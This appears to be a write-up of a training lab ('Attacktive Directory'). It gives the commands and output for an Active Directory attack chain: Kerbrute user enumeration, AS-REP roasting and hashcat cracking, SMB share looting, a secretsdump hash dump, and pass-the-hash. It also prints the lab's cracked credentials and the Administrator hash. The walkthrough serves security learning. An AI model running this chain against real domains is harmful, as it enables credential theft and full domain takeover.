Installing Impacket:

Whether you're on the Kali 2019.3 or Kali 2021.1, Impacket can be a pain to install correctly. Here's some instructions that may help you install it correctly!

First, you will need to clone the Impacket Github repo onto your box. The following command will clone Impacket into /opt/impacket:

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

After the repo is cloned, you will notice several install related files, requirements.txt, and setup.py. A commonly skipped file during the installation is setup.py, this actually installs Impacket onto your system so you can use it and not have to worry about any dependencies.

To install the Python requirements for Impacket:

pip3 install -r /opt/impacket/requirements.txt

Once the requirements have finished installing, we can then run the python setup install script:

cd /opt/impacket/ && python3 ./setup.py install

After that, Impacket should be correctly installed now and it should be ready to use!

If you are still having issues, you can try the following script and see if this works:

Credit for proper Impacket install instructions goes to Dragonar#0923 in the THM Discord <3

Installing Bloodhound and Neo4j

Bloodhound is another tool that we'll be utilizing while attacking Attacktive Directory. We'll cover specifcs of the tool later, but for now, we need to install two packages with Apt, those being bloodhound and neo4j. You can install it with the following command:

apt install bloodhound neo4j

Now that it's done, you're ready to go!

Troubleshooting

If you are having issues installing Bloodhound and Neo4j, try issuing the following command:

apt update && apt upgrade

Enumeration with nmap and Enum4linux :

After the nmap scan, we see that the port 139 and 445 are open, so we can use "enum4linux" to see what domains are available.

"enum4linux -a" option does all the common options.

nmap scan result

Nmap scan report for 10.10.100.215
Host is up (0.13s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 26.97 seconds
❯ nmap -A 10.10.100.215
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-16 12:28 EST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 6.75% done; ETC: 12:29 (0:00:14 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 37.18% done; ETC: 12:29 (0:00:07 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 12:29 (0:00:00 remaining)
Nmap scan report for 10.10.100.215
Host is up (0.14s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-16 17:29:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-01-16T17:29:27+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-15T17:13:49
|_Not valid after:  2022-07-17T17:13:49
|_ssl-date: 2022-01-16T17:29:35+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-16T17:29:27
|_  start_date: N/A

Service detection performed

Enumerating with Kerberos

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

Download the older version (1.0.2) as the userenum option is available and 1.0 was not stable.

For this box, a modified User List and Password List will be used to cut down on time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.

Updated the etc/hosts with the domain name (spookysec.local)

I've specified the domain controller as it was giving me an error without it.

./kerbrute userenum -d spookysec.local --dc spookysec.local kerberoesuser.txt

Introduction

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Retrieving Kerberos Tickets

Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

Let's determine the hash type by visiting the hashcat wiki page.

After entering the first part of the hash, I was able to see that it's "Kerberos 5, etype 23, AS-REP" and has the 18200 hash-mode.

Create a hash file and a password list file to crack it

hashcat -m 18200 hash.txt pass.txt
Dictionary cache built:
* Filename..: pass.txt
* Passwords.: 70189
* Bytes.....: 569237
* Keyspace..: 70189
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f0a97f889f9fbbcd6806ba1d47dbdd90$f601dc3e42fc28c4ba6500fc642c6ffc7863d9baa52aa80af85188cb80741fcedf6526868e61170cf36e4c820a299495a2e182e898de7be3cb1b1aebb3cc90c88ff694e0ac3dec1ddfd87db8f0f4acebbdda3ba005cc9bfb66ab7964d5afc1d06039e4cc479fc8c22b9f98e869acb5bf0b68cbd7fa42e378a2fcee4357fa83065cfd37c0792a3494727227a4e665f3e87da1b6ca8c2a0db21e985fadf89675f1038b20cb4583b56d7a3221515765d95cf8d7583a4380930feb0aaf3b6e479bc3f63cf71764fb47c67bfaf492e915c50a7d21e32ceed369bfff8d660072ac74277d6b7b62f96200f72cd97b929470930aaa42:management2005
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:f0a97f889f9...0aaa42
Time.Started.....: Sun Jan 16 13:29:05 2022 (0 secs)
Time.Estimated...: Sun Jan 16 13:29:05 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1455.8 kH/s (0.42ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7168/70189 (10.21%)
Rejected.........: 0/7168 (0.00%)
Restore.Point....: 6144/70189 (8.75%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: horoscope -> frida
Hardware.Mon.#1..: Util: 25%

Cracked it!

Discovering File-shares with smbclient

Enumeration:

With a user's account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.

smbclient -L \10.10.162.190\ -U svc-admin

this will list the file shares within.

Enumerate the resulted shared folders

smbclient \\10.10.162.190\backup\ -U svc-admin

Juicy file found!

use the smb command "get" to download it to the attacker's machine.

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw~zsh

This looks like base64

Decode this by typing

base64 -d backup_credentials.txt

Domain Privilege Escalation Elevating Privileges within the Domain

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account "backup" gets us thinking. What is this the backup account to?

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes

Knowing this, we can use another tool within Impacket called "secretsdump.py". This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

impacket-secretsdump backup@spookysec.local:backup2517860

I couldn't get this to work for a min since I was adding "%" at the end which wasn't the part of the password :(

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

Try the Hash the pass method to elevate the privilege!

Use a tool Evil-WinRM

This room was so much fun!!